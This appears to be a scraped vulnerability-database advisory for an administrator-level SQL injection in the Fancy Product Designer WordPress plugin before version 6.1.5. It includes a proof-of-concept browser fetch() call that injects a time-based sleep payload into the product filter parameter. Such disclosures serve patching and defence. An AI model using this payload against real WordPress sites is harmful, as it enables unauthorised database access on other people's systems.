Lucene search

K
wpvulndbIvan SpiridonovWPVDB-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18
HistoryFeb 20, 2024 - 12:00 a.m.

Fancy Product Designer < 6.1.5 - Admin+ SQL Injection

2024-02-2000:00:00
Ivan Spiridonov
wpscan.com
5
sql injection
admin+ module
security vulnerability
wordpress plugin

7.4 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

Description The plugin does not properly sanitise and escape a parameter before using it in a SQL statement, leading to a SQL injection exploitable by adminstrators.

PoC

- Log in as an administrator, and visit /wp-admin/. - Add a Catalog Product in /wp-admin/admin.php?page=fancy_product_designer - Search for “fpd_dismiss_notification” in the page’s source, note down the associated nonce - Send the following fetch() command in your browser’s console, and replace $NONCE with the nonce: fetch('/wp-admin/admin-ajax.php?action=fpd_get_products&_ajax_nonce=$NONCE&amp;filter;_by=ID%2c(select*from(select(sleep(20)))a)&amp;sort;_by=ASC&amp;page;=1&amp;type;=catalog').then(x=&gt;x.text()).then(x=&gt;console.log(x)) Notice it takes approximately 20 seconds for the server to answer, confirming our injected SQL statements were executed.

CPENameOperatorVersion
eq6.1.5

7.4 High

AI Score

Confidence

Low

0.0004 Low

EPSS

Percentile

9.1%

Related for WPVDB-ID:4B8B9638-D52A-40BC-B298-AE1C74788C18